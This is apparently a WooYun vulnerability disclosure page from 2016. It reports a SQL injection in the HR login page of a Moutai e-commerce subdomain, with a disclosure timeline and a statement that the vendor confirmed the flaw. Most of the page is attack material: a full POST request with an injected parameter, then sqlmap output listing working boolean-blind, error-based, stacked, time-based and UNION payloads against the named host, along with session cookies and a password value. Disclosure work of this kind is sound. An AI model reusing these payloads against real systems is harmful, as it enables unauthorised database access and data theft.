当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167917

漏洞标题:茅台电商某站存在SQL注入漏洞

相关厂商:emaotai.cn

漏洞作者: 路人甲

提交时间:2016-01-07 11:24

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-07: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

详细说明:

POST /HR/LoginTo.aspx HTTP/1.1
Content-Length: 2582
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDSCCBCCDA=IPNFJCACIPIDNNMGCKJMPDMF; ASPSESSIONIDCCCBCCCD=KHNOLFJBBJEONDPDLKBGBILM; ASP.NET_SessionId=q4kzrpxykpmueu322hye42ii
Host: xs.emaotai.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
btnlogin=&cbxOrgs=e&cbxOrgs%24DDD%24L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42%2c1_74%2c2_22%2c2_29%2c2_21%2c1_67%2c1_64%2c2_24%2c1_41%2c2_15&tbxPassword=g00dPa%24%24w0rD&UsersPanel%24cbxUsers=e&UsersPanel%24cbxUsers%24DDD%24L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=1* -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM%2bskZ93r%2bLE0i79YMR0%2b6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm%2bi1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho%2bahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs%2bWKqOe6quW%2bi%2bebkeWvn%2bWupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L%2bd566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD%2beUn%2ba0u%2bacjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu%2bmAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L%2bh5oGv5Lit5b%2bDHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y%2bR5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW%2bkOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee%2bih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw%3d%3d&__VIEWSTATEGENERATOR=CAB2EC08

3.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=1 AND 4062=4062 -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=1 AND 9453=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9453=9453) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113))) -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1593=1593) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113)) -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=1;WAITFOR DELAY '0:0:5'-- -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=1 WAITFOR DELAY '0:0:5' -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=1 UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(69)+CHAR(66)+CHAR(106)+CHAR(67)+CHAR(70)+CHAR(82)+CHAR(72)+CHAR(100)+CHAR(88)+CHAR(85)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113)--  -- 